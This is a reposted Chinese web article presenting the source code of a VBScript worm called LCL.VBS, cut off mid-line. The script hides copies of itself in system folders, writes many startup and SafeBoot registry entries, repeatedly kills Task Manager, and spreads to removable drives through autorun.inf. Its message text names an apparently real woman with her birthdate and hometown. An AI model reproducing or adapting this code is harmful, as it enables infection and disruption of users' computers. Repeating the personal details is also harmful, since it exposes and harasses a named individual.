LCL.VBS 病毒源代码
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| rem email:kouguoxi@hotmail.com rem some crack statement i remment,make it can''t to run onerrorresumenext dimtitle,text title="canyouhelpmefindaperson?" text="hernameisLiuChunli."&chr(13)&chr(10) text=text&"herbirthdayis1981-01-23."&chr(13)&chr(10) text=text&"hermotherhomeisYuzhen.Qixian.Kaifeng.Henan.China."&chr(13)&chr(10) text=text&"Iwasdiedbecausebyher,"&chr(13)&chr(10) text=text&"Iamdemandingmylifeofyou."&chr(13)&chr(10) Setfso=CreateObject("Scripting"&"."&"FileSystem"&"Object") self=fso.opentextfile(wscript.scriptfullname,1).readall setWshShell=WScript.CreateObject("WScript"&"."&"Shell") Startup=WshShell.SpecialFolders("Startup") Setdirwin=fso.GetSpecialFolder(0) Setdirsystem=fso.GetSpecialFolder(1) Setdirtemp=fso.GetSpecialFolder(2) Setlcl=fso.GetFile(WScript.ScriptFullName) lcl.Copy(dirwin&"\lcl.vbs") lcl.Copy(dirsystem&"\lcl.vbs") fso.getfile(dirwin&"\lcl.vbs").attributes=7 fso.getfile(dirsystem&"\lcl.vbs").attributes=7 setsf0=fso.GetSpecialFolder(0) b=sf0.drive&"\lcl.txt" Setlcl=fso.CreateTextFile(b,True) lcl.Writetext fso.CopyFileb,Startup&"\lcl.txt" lcl.Close dimlcl Setlcl=fso.CreateTextFile(wscript.scriptfullname,True) Functionscode(N) dimx forx=0to254 ifn=chr(x)then scode=x exitfunction endif next endfunction rem请教:用readline等方法,整行加密,保持文本格式不不变;和解密办法。 remexecute我用不好请赐教。 dimcc,cipher,correy forl=1tolen(self) cc=mid(self,l,1) ifl>99andinstr(self,"LiuChunli")>0then cipher=chr(scode(cc)+9)rem我开始用99,得到的全是ascll为0的数据 else cipher=chr(scode(cc)) endif correy=correy&cipher next lcl.Writecorrey lcl.Close dimhk,hc,safe hk="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run" hc="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" wshshell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout",0,"REG_DWORD" wshshell.Regwritehk&"\lcl",dirsystem&"\lcl.vbs" wshshell.Regwritehk&"exec\lcl",dirsystem&"\lcl.vbs" wshshell.Regwritehk&"Once\lcl",dirsystem&"\lcl.vbs" wshshell.Regwritehk&"OnceEx\lcl",dirsystem&"\lcl.vbs" wshshell.Regwritehk&"service\lcl",dirsystem&"\lcl.vbs" wshshell.Regwritehk&"Services\lcl",dirsystem&"\lcl.vbs" wshshell.Regwritehc&"\lcl",dirsystem&"\lcl.vbs" wshshell.Regwritehc&"exec\lcl",dirsystem&"\lcl.vbs" wshshell.Regwritehc&"Once\lcl",dirsystem&"\lcl.vbs" wshshell.Regwritehc&"service\lcl",dirsystem&"\lcl.vbs" safe="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\" wshshell.Regwritesafe&"Minimal\lcl.vbs",dirsystem&"\lcl.vbs" wshshell.Regwritesafe&"Network\lcl.vbs",dirsystem&"\lcl.vbs" do wshshell.run"cmd/ctaskkill/f/imtaskmgr.exe",0 wshshell.run"cmd/ctaskkill/f/imtasklist.exe",0 loop dimd ForEachdinfso.Drives ifd.drivetype<>4then fso.CopyFileb,d&"\lcl.txt" scan(d) endif ifd.drivetype=1andd.isready=trueandFormatNumber(d.FreeSpace/1024,0)>99then fso.copyfilewscript.scriptfullname,d&"\lcl.vbs" fso.getfile(wscript.scriptfullname).attributes=7 setinf=fso.createtextfile(d&"\autorun.inf",true) fso.getfile(d&"\aut |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: vbs下一些取特殊路径的方法总结下一篇: VBS调用WMI快速关闭IE的脚本
关于LCL.VBS 病毒源代码的所有评论
